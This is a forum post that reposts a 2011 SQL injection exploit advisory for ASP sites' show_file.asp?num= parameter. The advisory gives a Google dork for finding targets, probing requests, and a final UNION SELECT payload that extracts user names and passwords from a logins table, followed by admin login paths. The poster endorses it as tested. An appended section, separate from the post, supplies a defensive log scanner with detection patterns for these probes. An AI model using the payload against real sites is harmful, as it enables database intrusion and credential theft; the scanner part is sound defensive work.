08-30-2011, 12:44 PM
This is a SQL injection bug for ASP.NET sites, and this is its exploit. I tested it and it's a good one. An Arab wrote it, but it's a very simple thing :-)
Code:
=============================================
ASP Exploitation SQL Injection Vulnerability
=============================================
#######################################################################
#
# Exploit Title: [ ASP Exploitation SQL Injection Vulnerability ] ..
#
# Date: [ 2010-06-17 ] ..
#
# Author: [ SUp3r00t - heShAm_HaCkEr ] ..
#
# Version: [ Scripts((asp)) ] ..
#
# Google dork: [ show_file.asp?num= ] ..
#
# TeaM: [ T.v.T ((http://www.pro1tv.com)) ] ..
#
# From: Saudi Arabia ..
#
# Gr33t's: The Master|Al-Kaser20|T.v.T
#
#category: [SQL Injecti0n] ..
#
#######################################################################
# Exploit :
http://[site]/path/show_file.asp?num={SQL}
# Analysis:
http://[site]/path/show_file.asp?num=Number
union select ((Number)) login, ((Number)) from logins
========================================================================
# Like:
http://[site]/path/show_file.asp?num=50
http://[site]/path/show_file.asp?num=50'
http://[site]/path/show_file.asp?num=50 having 1=1
((')) <<<<< Keep the label to show a query site involved ..
(( having 1=1 )) << Yes, this revealed the site involved ..
========================================================================
# Like:1
http://[site]/path/show_file.asp?num=50 order by 20
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from logins
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,name,19,20 from logins
union select 1,2,3,4,5,6,7,8,9,10,11,12,password,14,15,16,17,18,19,20 from logins
========================================================================
# Final:
http://[site]/path/show_file.asp?num=-50 union select 1,2,3,4,5,6,7,8,9,10,11,12,password,14,15,16,17,name,19,20 from logins
The source of plaque control:-
http://[site]/path/admin "OR" http://[site]/path/login
cpanel: http://[site]/admin "OR" http://[site]/login
========================================================================
./ Sup3r00t@gmail.com
./ pro1tv.com
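
Added example (not part of the original post or the quoted advisory): a defender-side log scanner that flags requests to show_file.asp whose num value is not a plain integer and names which of the advisory's probe shapes it resembles. The simplified log layout, the sample lines and the function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Probe shapes taken from the requests listed in the advisory above.
STAGES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("column-count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("error-probe", re.compile(r"\bhaving\b\s+\d+\s*=\s*\d+", re.I)),
    ("quote-probe", re.compile(r"['\"]")),
]
INTEGER = re.compile(r"-?\d+\Z")  # the only shape a record id should have
# Constructed sample lines; assumed layout: date time client-ip method uri status
SAMPLE_LOG = [
    "2011-08-30 09:12:01 192.0.2.10 GET /path/show_file.asp?num=50 200",
    "2011-08-30 09:12:07 198.51.100.7 GET /path/show_file.asp?num=50%27 500",
    "2011-08-30 09:12:15 198.51.100.7 GET /path/show_file.asp?num=50+having+1=1 500",
    "2011-08-30 09:12:30 198.51.100.7 GET /path/show_file.asp?num=50+order+by+20 200",
    "2011-08-30 09:13:02 198.51.100.7 GET /path/show_file.asp?NUM=-50+UNION+SELECT+1,2+from+logins 200",
    "2011-08-30 09:13:40 192.0.2.10 GET /path/show_file.asp?num=abc 500",
]

def classify_num(url):
    """Return None for a clean request, else the name of the matching probe shape."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/show_file.asp"):
        return None
    for key, value in parse_qsl(parts.query, keep_blank_values=True):  # decodes %xx and '+'
        if key.lower() != "num" or INTEGER.match(value.strip()):
            continue
        for name, pattern in STAGES:
            if pattern.search(value):
                return name
        return "non-integer"  # not a known probe, but still not a valid id
    return None

def scan(log_lines):
    """Yield (client_ip, stage, uri) for every flagged log line."""
    for line in log_lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 6:
            continue
        stage = classify_num(fields[4])
        if stage:
            yield fields[2], stage, fields[4]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

The same integer-only check belongs in the page itself, together with a parameterized query, so that a non-numeric num never reaches the database.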